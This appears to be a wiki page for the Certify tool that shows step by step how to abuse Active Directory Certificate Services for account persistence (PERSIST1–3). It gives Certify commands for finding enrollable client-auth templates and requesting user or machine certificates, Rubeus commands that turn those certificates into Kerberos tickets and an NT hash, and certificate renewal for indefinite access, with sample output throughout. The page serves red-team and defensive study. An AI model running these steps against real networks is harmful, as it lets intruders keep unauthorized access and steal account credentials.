-
Notifications
You must be signed in to change notification settings - Fork 273
2 ‐ Account Persistence Techniques
In June 2021, Will Schroeder and Lee Chagolla-Christensen released a paper on Active Directory Certificate Services (AD CS) called Certified Pre-Owned. The paper featured a range of account persistence techniques dubbed PERSIST1 through PERSIST3 and a range of domain persistence techniques dubbed DPERSIST1 through DPERSIST3.
This git page seeks to help you understand the different persistence techniques and showcase how you can carry out the relevant actions using Certify.
PERSIST1 is a technique used to extend initial access to a user into persistent access by requesting a client authentication certificate in the context of the user account, which can be used for future authentication as the user account. If, for example, a phishing attack is successful and access is obtained as a user for which the credentials are unknown, persistent access to that user can be obtained through certificates.
According to Certified Pre-Owned, the following criteria comprise a suitable certificate template:
- The enterprise CA grants enrollment rights to the user account.
- Otherwise, the account would be unable to request any certificates from the CA.
- The certificate template grants enrollment rights to the user account.
- Otherwise, the account would be unable to request certificates based on the specific template.
- The "manager approval" feature is disabled for the certificate template.
- Otherwise, a "CA Manager" would have to manually review and approve the certificate request.
- The "authorized signature" feature is disabled for the certificate template.
- Otherwise, an enrollment agent would need to sign the certificate request on behalf of the requester.
- The certificate template defines an Extended Key Usage (EKU) that enables client authentication.
-
Client Authentication(1.3.6.1.5.5.7.3.2) -
PKINIT Client Authentication(1.3.6.1.5.2.3.4) -
Smart Card Logon(1.3.6.1.4.1.311.20.2.2) -
Any Purpose(2.5.29.37.0) -
Subordinate CA(No EKUs)
-
We can search for certificate templates with these conditions using the enum-templates --filter-client-auth command from Certify. For more information about the command and its parameters, please refer to the Command Overview page.
> Certify.exe enum-templates --filter-enabled --filter-client-auth --hide-admins
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v2.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=corp,DC=local'
[*] Classifying vulnerabilities in the context of built-in low-privileged domain groups.
...
[*] Enabled certificate templates found using the current filter parameters:
Template Name : User
Enabled : True
Publishing CAs : ca01.corp.local\CORP-CA01-CA
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
Certificate Name Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
Enrollment Flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
+ Manager Approval Required : False
+ Authorized Signatures Required : 0
+ Extended Key Usage : Client Authentication, Encrypting File System, Secure Email
Certificate Application Policies : <null>
Permissions
Enrollment Permissions
+ Enrollment Rights : CORP\Domain Users S-1-5-21-976219687-1556195986-4104514715-513
Object Control Permissions
Certify completed in 00:00:01.7777410Once we have identified a suitable certificate template that the user account can enroll in, we can request a certificate based on the template using the request command from Certify.
> Certify.exe request --ca ca01.corp.local\CORP-CA01-CA --template User
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v2.0.0
[*] Action: Request a certificate
[*] Current user context : CORP\lowpriv
[*] No subject name specified, using current context as subject.
[*] Template : User
[*] Subject : CN=lowpriv, OU=Users, OU=Corp, DC=corp, DC=local
[*] Certificate Authority : ca01.corp.local\CORP-CA01-CA
[*] CA Response : The certificate has been issued.
[*] Request ID : 1
[*] Certificate (PFX) :
MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh...
Certify completed in 00:00:04.3614718
When the certificate has been issued, it can be used to persistently authenticate as the user account using the asktgt command from Rubeus. We can also use the /getcredentials parameter to request a U2U service ticket and retrieve the password NT hash for the user account.
> Rubeus.exe asktgt /user:lowpriv /certificate:MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh... /getcredentials
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.2
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: E=lowpriv@corp.local, CN=lowpriv, OU=Users, OU=Corp, DC=corp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'corp.local\lowpriv'
[*] Using domain controller: 10.10.10.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGHjCCBhqgAwIBBaEDAgEWooIFMTCCBS1hggUpMIIFJaADAgEFoQ8bDU1FR0FLRUsuTE9DQUyiIjAg
...
ServiceName : krbtgt/corp.local
ServiceRealm : CORP.LOCAL
UserName : lowpriv
UserRealm : CORP.LOCAL
StartTime : 30/06/2025 15.16.52
EndTime : 01/07/2025 01.16.52
RenewTill : 07/07/2025 15.16.52
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : AFXzq5Bai41JhCj70jrfyA==
ASREP (key) : D4F939DAB9C7B93717EB048B0F0F5F5C
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
+ NTLM : 31D6CFE0D16AE931B73C59D7E0C089C0The issued certificate will be able to authenticate for as long as is mentioned in the Validity Period attribute of the certificate template. In order to extend the persistence period, we need to abuse PERSIST3.
PERSIST2 is a technique used to extend initial access to a machine into persistent access by requesting a client authentication certificate in the context of the machine account, which can be used for future authentication as the machine account. This requires administrative privileges on the system.
According to Certified Pre-Owned, the following criteria comprise a suitable certificate template:
- The enterprise CA grants enrollment rights to the machine account.
- Otherwise, the account would be unable to request any certificates from the CA.
- The certificate template grants enrollment rights to the machine account.
- Otherwise, the account would be unable to request certificates based on the specific template.
- The "manager approval" feature is disabled for the certificate template.
- Otherwise, a "CA Manager" would have to manually review and approve the certificate request.
- The "authorized signature" feature is disabled for the certificate template.
- Otherwise, an enrollment agent would need to sign the certificate request on behalf of the requester.
- The certificate template defines an Extended Key Usage (EKU) that enables client authentication.
-
Client Authentication(1.3.6.1.5.5.7.3.2) -
PKINIT Client Authentication(1.3.6.1.5.2.3.4) -
Smart Card Logon(1.3.6.1.4.1.311.20.2.2) -
Any Purpose(2.5.29.37.0) -
Subordinate CA(No EKUs)
-
We can search for certificate templates with these conditions using the enum-templates --filter-client-auth command from Certify. For more information about the command and its parameters, please refer to the Command Overview page.
> Certify.exe enum-templates --filter-enabled --filter-client-auth --hide-admins
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v2.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=corp,DC=local'
[*] Classifying vulnerabilities in the context of built-in low-privileged domain groups.
...
[*] Enabled certificate templates found using the current filter parameters:
Template Name : Machine
Enabled : True
Publishing CAs : ca01.corp.local\CORP-CA01-CA
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
Certificate Name Flag : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
Enrollment Flag : AUTO_ENROLLMENT
+ Manager Approval Required : False
+ Authorized Signatures Required : 0
+ Extended Key Usage : Client Authentication, Server Authentication
Certificate Application Policies : <null>
Permissions
Enrollment Permissions
+ Enrollment Rights : CORP\Domain Computers S-1-5-21-976219687-1556195986-4104514715-515
Object Control Permissions
Certify completed in 00:00:01.7777410Once we have identified a suitable certificate template that the machine account can enroll in, we can request a certificate based on the template using the request command from Certify.
> Certify.exe request --ca ca01.corp.local\CORP-CA01-CA --template Machine --machine
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v2.0.0
[*] Action: Request a certificate
[*] Elevating to SYSTEM context for machine cert request
[*] Current user context : NT AUTHORITY\SYSTEM
[*] No subject name specified, using current machine as subject
[*] Template : Machine
[*] Subject : CN=WS01.corp.local
[*] Certificate Authority : ca01.corp.local\CORP-CA01-CA
[*] CA Response : The certificate has been issued.
[*] Request ID : 1
[*] Certificate (PFX) :
MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh...
Certify completed in 00:00:03.5329344
When the certificate has been issued, it can be used to persistently authenticate as the machine account using the asktgt command from Rubeus.
> Rubeus.exe asktgt /user:WS01$ /certificate:MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh...
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.2
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=WS01.corp.local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'corp.local\WS01$'
[*] Using domain controller: 10.10.10.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGAjCCBf6gAwIBBaEDAgEWooIFFzCCBRNhggUPMIIFC6ADAgEFoQ8bDU1FR0FLRUsuTE9DQUyiIjAg
...
ServiceName : krbtgt/corp.local
ServiceRealm : CORP.LOCAL
UserName : WS01$
UserRealm : CORP.LOCAL
StartTime : 30/06/2025 15.32.19
EndTime : 01/07/2025 01.32.19
RenewTill : 07/07/2025 15.32.19
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 1c0P/+z4mogj2vJl122GvA==
ASREP (key) : B357DDA2405237F78276BB9DA9720749
The issued certificate will be able to authenticate for as long as is mentioned in the Validity Period attribute of the certificate template. In order to extend the persistence period, we need to abuse PERSIST3.
PERSIST3 is a technique used to extend the lifetime of persistence obtained through PERSIST1 or PERSIST2. Certificate templates have a Validity Period attribute that determines for how long an issued certificate can be used as well as a Renewal Period attribute that determines for how long an issued certificate can be renewed.
If we look at the User and Machine templates displayed in PERSIST1 or PERSIST2, we see that they have the default values for Validity Period (1 year) and Renewal Period (6 weeks). This effectively means that certificates issued from these templates can be used for 1 year, but can only be renewed in the first 6 weeks after being issued.
Template Name : User
Enabled : True
Publishing CAs : ca01.corp.local\CORP-CA01-CA
Schema Version : 1
+ Validity Period : 1 year
+ Renewal Period : 6 weeks
Certificate Name Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
Enrollment Flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Manager Approval Required : False
Authorized Signatures Required : 0
Extended Key Usage : Client Authentication, Encrypting File System, Secure Email
Certificate Application Policies : <null>
Permissions
Enrollment Permissions
Enrollment Rights : CORP\Domain Users S-1-5-21-976219687-1556195986-4104514715-513
Object Control Permissions
Template Name : Machine
Enabled : True
Publishing CAs : ca01.corp.local\CORP-CA01-CA
Schema Version : 1
+ Validity Period : 1 year
+ Renewal Period : 6 weeks
Certificate Name Flag : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
Enrollment Flag : AUTO_ENROLLMENT
Manager Approval Required : False
Authorized Signatures Required : 0
Extended Key Usage : Client Authentication, Server Authentication
Certificate Application Policies : <null>
Permissions
Enrollment Permissions
Enrollment Rights : CORP\Domain Computers S-1-5-21-976219687-1556195986-4104514715-515
Object Control PermissionsIf we continuously renew a certificate before expiration of the Renewal Period, we can extend our persistence indefinitely. This can be done using the request-renew command from Certify.
> Certify.exe request-renew --ca ca01.corp.local\corp-CA01-CA --cert-pfx MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh...
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v2.0.0
[*] Action: Request a certificate renewal
[*] Current user context : CORP\lowpriv
[*] Certificate Authority : ca01.corp.local\CORP-CA01-CA
[*] CA Response : The certificate has been issued.
[*] Request ID : 2
[*] Certificate (PFX) :
MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh...
Certify completed in 00:00:03.8915965